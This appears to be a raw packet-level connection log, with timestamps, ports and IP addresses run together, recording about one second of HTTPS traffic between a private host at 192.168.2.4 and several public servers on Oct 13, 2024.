                                                                                                                          Oct 13, 2024 18:20:42.944914103 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.944915056 CEST44349753104.26.13.205192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.944937944 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.944947958 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.944993019 CEST44349753104.26.13.205192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.944994926 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.945002079 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.945046902 CEST49753443192.168.2.4104.26.13.205
                                                                                                                          Oct 13, 2024 18:20:42.945419073 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.945476055 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.945496082 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.945514917 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.945533037 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:42.945595026 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.945630074 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:42.945630074 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:42.946398020 CEST44349752173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.947881937 CEST49752443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:42.947911024 CEST44349752173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.948982000 CEST44349752173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.949043989 CEST49752443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:42.949502945 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.949533939 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.949548960 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.949557066 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.949596882 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.949604988 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.949863911 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.949893951 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.949904919 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.949917078 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.949949026 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.949958086 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.949964046 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.950012922 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.950071096 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.950090885 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.950130939 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:42.950146914 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.950175047 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:42.950472116 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.950490952 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.950530052 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:42.950541019 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.950597048 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.950604916 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:42.950650930 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.950700045 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.950707912 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.950766087 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.950810909 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.950818062 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.951488018 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.951533079 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.951540947 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.951874018 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.951922894 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.951930046 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.952292919 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.952347040 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:42.952359915 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.952367067 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.952399015 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.952409983 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.952416897 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.952447891 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.952459097 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.952465057 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.952510118 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.953206062 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.953272104 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:42.953285933 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.953846931 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.955214977 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.955252886 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.955254078 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.955265045 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.955307007 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.955313921 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.955679893 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.955722094 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.955729961 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.956249952 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.956294060 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.956300974 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.956533909 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.956578016 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.956584930 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.956876040 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.956922054 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.956928968 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.957257032 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.957288027 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.957303047 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.957310915 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.957350969 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.957541943 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.957906961 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.957946062 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.957952976 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.958295107 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.958340883 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.958348036 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.958669901 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.958712101 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.958719015 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.959021091 CEST49752443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:42.959031105 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.959093094 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.959100008 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.959103107 CEST44349752173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.960886955 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.960921049 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.960936069 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.960942984 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.960978985 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.960983038 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.960989952 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.961036921 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.961042881 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.961070061 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.961119890 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.961127043 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.961405993 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.961450100 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.961457014 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.961477995 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.961519957 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.967467070 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.967551947 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:42.967571974 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.971699953 CEST49752443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:42.971746922 CEST44349752173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.979134083 CEST49756443192.168.2.4184.28.90.27
                                                                                                                          Oct 13, 2024 18:20:42.979223967 CEST44349756184.28.90.27192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.979299068 CEST49756443192.168.2.4184.28.90.27
                                                                                                                          Oct 13, 2024 18:20:42.987437010 CEST49753443192.168.2.4104.26.13.205
                                                                                                                          Oct 13, 2024 18:20:42.987458944 CEST44349753104.26.13.205192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.989754915 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.991106033 CEST49756443192.168.2.4184.28.90.27
                                                                                                                          Oct 13, 2024 18:20:42.991134882 CEST44349756184.28.90.27192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.991667986 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.991687059 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.993536949 CEST44349755172.217.16.196192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.993921995 CEST49755443192.168.2.4172.217.16.196
                                                                                                                          Oct 13, 2024 18:20:42.993963003 CEST44349755172.217.16.196192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.994988918 CEST44349755172.217.16.196192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.995050907 CEST49755443192.168.2.4172.217.16.196
                                                                                                                          Oct 13, 2024 18:20:42.996221066 CEST49755443192.168.2.4172.217.16.196
                                                                                                                          Oct 13, 2024 18:20:42.996294022 CEST44349755172.217.16.196192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.997343063 CEST49758443192.168.2.491.228.74.159
                                                                                                                          Oct 13, 2024 18:20:42.997384071 CEST4434975891.228.74.159192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.997458935 CEST49758443192.168.2.491.228.74.159
                                                                                                                          Oct 13, 2024 18:20:42.998258114 CEST49758443192.168.2.491.228.74.159
                                                                                                                          Oct 13, 2024 18:20:42.998275995 CEST4434975891.228.74.159192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.008204937 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.017468929 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.017491102 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.017507076 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.017530918 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.017577887 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.018193960 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.018210888 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.018245935 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.018277884 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.019243956 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.019263029 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.019299030 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.019329071 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.020966053 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.020983934 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.021039963 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.022281885 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.022353888 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.024039030 CEST49752443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:43.031008005 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.031091928 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.039602041 CEST49755443192.168.2.4172.217.16.196
                                                                                                                          Oct 13, 2024 18:20:43.039633036 CEST44349755172.217.16.196192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.059983015 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.060060978 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.081322908 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.081397057 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.081924915 CEST49755443192.168.2.4172.217.16.196
                                                                                                                          Oct 13, 2024 18:20:43.110371113 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.110440016 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.110568047 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.110631943 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.110641956 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.110698938 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.111155987 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.111221075 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.111535072 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.111601114 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.111656904 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.111721992 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.112508059 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.112586021 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.112622023 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.112694025 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.123503923 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.123583078 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.123660088 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.123725891 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.152530909 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.152612925 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.152662992 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.152724981 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.174313068 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.174390078 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.181607962 CEST44349752173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.181632996 CEST44349752173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.181641102 CEST44349752173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.181693077 CEST44349752173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.181721926 CEST49752443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:43.181721926 CEST49752443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:43.181744099 CEST44349752173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.181772947 CEST49752443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:43.202768087 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.202881098 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.202924967 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.202970028 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.203181982 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.203243017 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.203512907 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.203576088 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.203808069 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.203872919 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.203999043 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.204058886 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.204090118 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.204149008 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.204751968 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.204801083 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.205039024 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.205111027 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.205137968 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.205197096 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.205662966 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.205733061 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.216217041 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.216284990 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.234188080 CEST49752443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:43.245060921 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.245155096 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.245409966 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.245481014 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.245696068 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.245771885 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.246092081 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.246161938 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.248100042 CEST44349752173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.248109102 CEST44349752173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.248161077 CEST44349752173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.248184919 CEST49752443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:43.248209000 CEST49752443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:43.273269892 CEST44349752173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.273278952 CEST44349752173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.273327112 CEST44349752173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.273360968 CEST49752443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:43.273386002 CEST49752443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:43.274908066 CEST44349752173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.274914980 CEST44349752173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.274983883 CEST49752443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:43.275512934 CEST44349752173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.275521040 CEST44349752173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.275587082 CEST49752443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:43.295543909 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.295605898 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.295703888 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.295758009 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.296015024 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.296102047 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.296278000 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.296329021 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.296333075 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.296341896 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.296380997 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.296674013 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.296746969 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.296925068 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.296981096 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.297041893 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.297097921 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.536165953 CEST44349752173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.536175013 CEST44349752173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.536257982 CEST44349752173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.536294937 CEST49752443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:43.536326885 CEST44349752173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.536355972 CEST49752443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:43.536369085 CEST44349752173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.536400080 CEST49752443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:43.536410093 CEST44349752173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.536437988 CEST49752443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:43.536456108 CEST44349752173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.536490917 CEST49752443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:43.536520004 CEST49752443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:43.536910057 CEST49752443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:43.536942959 CEST44349752173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.537761927 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.537841082 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.537873030 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.537944078 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.538121939 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.538197041 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:43.538475990 CEST44349751162.214.111.33192.168.2.4
